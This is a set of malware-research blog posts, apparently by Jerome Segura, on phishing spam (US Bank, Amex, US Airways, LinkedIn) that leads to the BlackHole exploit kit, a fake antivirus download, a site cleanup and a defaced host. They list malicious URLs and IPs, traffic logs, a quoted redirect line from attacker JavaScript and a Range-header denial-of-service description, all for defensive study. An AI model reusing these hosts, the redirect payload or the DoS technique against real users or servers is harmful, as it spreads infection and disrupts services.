US Bank spam loads malware

A couple of variations for this US Bank scam:

Payload arrives from:

eurodynamic.fr/RQ1Pn7tW/index.html

a French site using Parallels’ Plesk interface:

which loads:

cosad.org/troWg0MB/js.js
fleetoffreedom.com/WEeuQHsH/js.js
maisonesquive.fr/yQqJfaoT/js.js
leofoto.it/t8kprRSB/js.js

And same final payload as previous post:

188.165.65.221/showthread.php?t=4a6d866826776084

American Express spam leads to exploit and malware

A phishing scam from Amex is loading malware onto PCs.

“Dear Customer, Our response is ready for you. Please login to the Secure Message Center to read it.”

The link points to:

sitildc.altervista.org/1y5zvsLm/index.html

It contains further links to javascript files:

falco48.altervista.org/0Kj8sF5v/js.js
ftp.certifiedfolder.com/BtUHDQRY/js.js
sushiminto.com/zPXs6eBz/js.js
santoromichele.it/acg5csdZ/js.js

The javascript js.js loads:

document.location=’http://188.165.65.221/showthread.php?t=d7ad916d1c0396ff’;

This is the final exploit code:

It comes from a server located in Roubaix, France (188.165.65.221).

Check out the Wepawet Report here. And the files it drops (89ce2b837bf2dcfa74dacffb07e6d26389ce2b837bf2dcfa74dacffb07e6d263).

First Class ticket to BlackHole Exploit Kit

Here is a spam email pretending to be from US Airways:

You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying abroad). Then, all you need to do is print your boarding pass and head to the gate.

Confirmation code: 755536

Check-in online: Online reservation details

Clicking on the link to view flight 8160 takes you to a malicious webpage that loads the BlackHole Exploit Kit where you can expect some turbulence:

Here is the traffic log:

imin2magic.com/admin/upload/agFjlln.html
arizonacentennialmens.com/main.php?page=c69cc723b6722b3a
imin2magic.com/favicon.ico
arizonacentennialmens.com/data/Pol.jar
arizonacentennialmens.com/w.php?f=79c45&e=0
arizonacentennialmens.com/w.php?e=5&f=79c45
scanforsecurytyholes.ru/mev/in/
testnosecurity.ru/mev/in/

And here is the BlackHole login page:

IP: 188.62.171.7 (Switzerland).

This is where the bad guys keep track of how many PCs they have managed to infect, where they can update the malicious payload, get stats etc…

The email campaigns are getting better and better at circumventing spam filters and the emails use themes that keep on changing. Remember to be very cautious when clicking any link or picture from an email, even if you think it is just an advert.

Jerome Segura

Old PornTube, New Rogue AV

It’s one of those days when you have a bit of nostalgia for the stuff you used to do. Back a year or so ago, I used to hunt down fake AV and the like. It involved fake YouTube sites, porn and more porn.

Out of curiosity, I started some searches, the same that I used to do to find the bad stuff.

Like I said, this is quite old (Feb 2011). I clearly remember redspacetube.com, it used to do redirections to various sites using Dynamic DNS.

Guess what? It’s still working!

seonetwizard.com/in.cgi?16&parameter=%3ftube-videos
seonetwizard.com/in.cgi?4
seonetwizard.com/in.cgi?14
directredirection.com/LI8wbTB8ycreCciKd26F8mpTD70hFJDu.php?sid=3
ygafigyuhigi.mrface.com/land/?n=loli&id=1

The DNS service is provided by changeIP.com (click to enlarge):

This page is quite familiar but looks ancient by now…

The file takes forever and a day to download…:

ygafigyuhigi.mrface.com/land/maindirectory/adobeflashplayerv10.2.152.32.exe

The very low detection rate on VirusTotal makes me wonder whether this file is really old or just too new… (2/41).

Next, I checked whether the file was half broken… but clearly it was working just fine:

It installs a fake AV called “Windows Trouble Taker” (should have been called Trouble Maker IMHO ;-) )

A quick search confirms this is not an old rogue AV, but rather the new kid on the block:

This is one tenacious fake porn tube… Can someone unplug redspacetube.com for good?

Jerome Segura

A real life example of a website cleanup after malware infection

Yesterday I cleaned up a site hosted on bluehost. I will show you how I proceeded from malware identification to removal.

First, I did a quick look up on StopBadware’s Clearing House:

It reported three different links containing malware. I opened them in a VM, looked at the source code and confirmed the problem:

It was time for a full website inspection and clean up.

I got access to the cPanel admin account, unfortunately SSH was not enabled (it isn’t by default, and you need to contact customer support). So, I went with FTP instead.

The thing with FTP is that you need to browse each folder by hand and you can’t run a script.

The site being relatively small, I downloaded a local copy. This makes it easy to do all the work with whatever scripts and tools you have installed.

The code was found in almost all the ‘.php’ files (and there were a lot of them!):

A grep command was able to find all the files containing these pieces of code:

Before making any changes, I backed up each file with a ‘.bak’ extension. Each file was then disinfected using a sed command.

Website infections are very common. Because it is easy to set up a website but difficult to maintain it (from a security point of view), most websites fall to automated scripts exploiting vulnerabilities.

This particular website was affected by a XSS vulnerability:

At SparkTrust we look at both ends of the spectrum: We protect your site by doing regular security checks to make sure script kiddies can’t hack the site with readily available tools. But for our new customers that are already infected, we also provide disinfection services.

To learn more about our services please visit SparkTrust.com.

Jerome Segura

Malicious LinkedIn emails force BlackHole exploit kit

LinkedIn has always been target by the bad guys. I remember back a few years ago fake profiles by the thousands were used to load malware onto unsuspecting users’ computers.

Well, spammers have been launching email campaigns with fake LinkedIn invites or notifications:

Clicking on the link means trouble:

Here is one particular domain that was live when I did this bog entry.

sixlefts.comicgenesis.com/JnFh1KEz/index.html

That page loads several external javascripts (note they are all identical, but using more than one ensures if one of the sites is down, the next one will be tried, therefore limiting the risk of single point of failure).

The javascript loads the actual exploit toolkit:
174.133.92.122/MgGsg1Pp/js.js


41.222.33.141:8080/showthread.php?t=73a07bcb51f4be71
41.222.33.141:8080/favicon.ico
41.222.33.141:8080/content/hcp_vbs.php?f=14095&d=0
41.222.33.141:8080/q.php?e=5&f=14095

This server’s IP is from South Africa, I was expecting more like Ukrainian or Russian based hotspot…

Steer clear!

Jerome Segura

Huge text blurb allows malicious code to go undetected

I recently wrote a spider that crawls a site for malicious code. While testing it, I ran into a particular issue that I thought would be worth sharing.

The first thing this spider does is download the content of the site using a specially crafted wget command passing parameters such as user agent, number of tries, recursion level etc…

Then I came across a domain that had been hacked (as the picture below shows) but the page was so incredibly long that the spider got caught into downloading a huge file. The length of the file being unspecified, you cannot know in advance what you are up against…

This method could allow an attacker to fool security tools that try to parse a site’s source code in real-time, while still executing a malicious payload.

Jerome Segura

Web host serverpro.com hacked, couple hundred thousand customers left hanging

The guys over at Sucuri have reported that web hosting company ServerPro has been hacked and their site defaced.

Before:

After:

Here is the traffic log when connecting to their site:

serverpro.com/
apprendre-le-hack.webobo.biz/haut/a/p/p/imghaut_apprendre-le-hack.jpg
www.youtube.com/v/2vz8LqWEjx4&feature=related&autoplay=1&loop=1
serverpro.com/favicon.ico
www.topcities.com/404.shtml

As far as I can tell, there is no malicious code.

The pic with the “pirate computer” is hosted on a French website which can be translated to “learn to hack” (apprendre le hack). Given the hackers’ signature, I have a feeling they may be from North Africa (and possibly Tunisia).

The hackers also embedded a YouTube soundtrack:

This sort of hack says a lot about web security… Even large companies with the proper resources can still fall to script kiddies exploiting known vulnerabilities or insecure passwords.

 

It’s quite easy to find out what this web server is running by looking at the HTTP header response:

Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 
X-Powered-By: PHP/5.2.9

 

Both Apache and PHP are out of date!

The latest Apache stable release is 2.2.22 (2.2 branch). The latest PHP version is 5.4.0 or (5.3.10 for the old stable release).

The version of Apache HTTP Server running on this host is affected by a denial of service vulnerability. Making a series of HTTP requests with overlapping ranges in the Range or Request-Range request headers can result in memory and CPU exhaustion. A remote, unauthenticated attacker could exploit this to make the system unresponsive. Exploit code is publicly available and attacks have reportedly been observed in the wild (CVE-2011-3192).

As if this was not enough, Apache 2.2.17 is also affected by these: CVE-2011-3368, CVE-2011-3607, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, CVE-2012-0053.

As far as PHP 5.2.9 goes, the list of CVEs is quite long and scary (59 in total).

 

Vulnerability scanning and patch management are not a panacea but have their place in making it more difficult for hackers to break into servers.

Do you own a website? Have you ever checked what software is running on it? Try SparkTrust’s web vulnerability scanner and fix potential issues before it’s too late!

 

Jerome Segura

Who needs a new malware repo when you already got some?

Even though I’ve passed on most of my duties over at malwareblacklist.com, I still like to check out new user requests.

Here is one from a “Threat Research Analyst” at a company called Dyomo:

So I decided to take a look at dyomo.net, which redirects to dyomo.com:

I never like to see the “Java plugin-in needs your permission to run” message. Although, I must say thank you Google for it, as in most cases it means there is something not quite right with a website.

Well, I wasn’t mistaken on that one… obfuscated code is never a good sign:

This blurb translates into a malicious iframe:

tds38.findhere.org is hosted in Russia (91.196.216.149).

All I can say is for now this dude doesn’t need malwareblacklist.com, he can pick right from his own backyard.

Jerome Segura